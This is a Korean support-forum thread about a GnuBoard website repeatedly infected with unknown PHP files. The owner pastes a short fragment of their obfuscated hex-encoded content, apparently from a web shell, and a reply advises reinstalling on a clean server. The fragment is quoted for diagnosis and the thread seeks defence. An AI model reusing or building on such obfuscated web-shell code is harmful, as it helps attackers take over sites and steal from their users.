그누보드 QA - 해킹이의심되어서 글올려봅니다.

해킹이의심되어서 글올려봅니다.

hero412 홈페이지 자기소개 회원게시물 회원 질문검색 회원 답변검색 회원 댓글검색

2018.05.01 15:38:18 2978 (203.♡.♡.196)

본문

몇주전부터 지속적으로 유독 그누보드쪽에 utf57.php,template87.php.... 등등 알수없는 파일들이 지속적으로 삽입되고 있습니다.

대부분 data폴더와 extend 폴더에 집중적으로 삽입되고 있으며, 해당파일을 열어보면

${"\x47\x4c\x4fB\x41\x4c\x53"}['v17d3'] = "\x6c\xa\x20\x2a\xd\x59\x27\x61\x55\x7a\x31\x62\x5a\x4b\x41\x60\x45\x4f\x2c\x48\x2f\x76\x79\x35\x5c\x54\x3b\x33\x53\x6f\x63\x58\x4a\x3d\x32\x75\x9\x30\x37\x2e\x73\x26\x2d\x39\x47\x3e\x7b\x5f\x57\x23\x7c\x56\x78\x50\x22\x34\x77\x64\x4e\x66\x5b\x38\x49\x6e\x21\x51\x70\x4c\x28\x43\x25\x24\x67\x68\x72\x6d\x7d\x3f\x65\x40\x42\x71\x74\x69\x6b\x29\x36\x3c\x6a\x3a\x5d\x46\x52\x4d\x7e\x44\x2b\x5e";
$GLOBALS[$GLOBALS['v17d3'][11].$GLOBALS['v17d3'][11].$GLOBALS['v17d3'][11].$GLOBALS['v17d3'][30].$GLOBALS['v17d3'][59].$GLOBALS['v17d3'][61].$GLOBALS['v17d3'][55]] = $GLOBALS['v17d3'][30].$GLOBALS['v17d3'][73].$GLOBALS['v17d3'][74];

이러한 소스가 도배되어 있습니다.

이것 때문에 패스워드도 변경하고 ftp 포트도 변경하고 별짓을 다했는데도 끈질기게 올라오네요..

그누보드 data폴더등을 이름도 변경해보고 dbconfig.php파일 자체를 다른쪽으로옮겨도 보고

config파일에서 G5_등..접두어도 변경해서 해보아도 소용이 없습니다.

그누보드는 3년전에 설치했던거 같습니다. 이미 많은부분이 구조적으로 변경된상태라서

패치도 여의치 않은 상태입니다.

서버아이피를 변경해야 될련지... 경험있으신분들 조언좀 부탁드립니다. ㅠㅠ

#그누보드5 #해킹 #웹쉘

답변 2

명랑폐인 홈페이지 자기소개 회원게시물 회원 질문검색 회원 답변검색 회원 댓글검색 님의 답변

2018-05-01 18:33:11 112.♡.♡.167

이미 다 털렸네요.. 웹서버에 이미 웹셀이 설치된 경우입니다.

웹셀 파일을 찾아서 삭제한 다음... 깨끗한 서버에 재설치를 하셔야 합니다.

기존 서버에 감염된 파일만 지우겠다는 생각은 안하셨으면 합니다.

이미 한번 털린 서버는 다시 털릴 가능성이 99%입니다. 소스를 다 점검하시고, 깨끗한 서버에 설치하세요.

↳ hero412 홈페이지 자기소개 회원게시물 회원 질문검색 회원 답변검색 회원 댓글검색

2018-05-02 11:22:01203.♡.♡.196

감사합니다... 웹쉘로 인해 일단, common.php 에서 extend 참조 하는 소스를 주석처리 하였습니다.
일단 모두 삭제는 하였습니다. 그리고 홈페이지 오픈하는데는 이상이 없는데요....

님 말씀처럼 서버를 다른곳으로 옮겨야 할듯합니다.

궁금한게 이러한 웹쉘공격으로 어떤 피해가 있을까요?
( 예).. 관리자접속번호 탈취, 서버트래픽발생등등...)
잘 몰라서 한번 물어봅니다...ㅜㅜ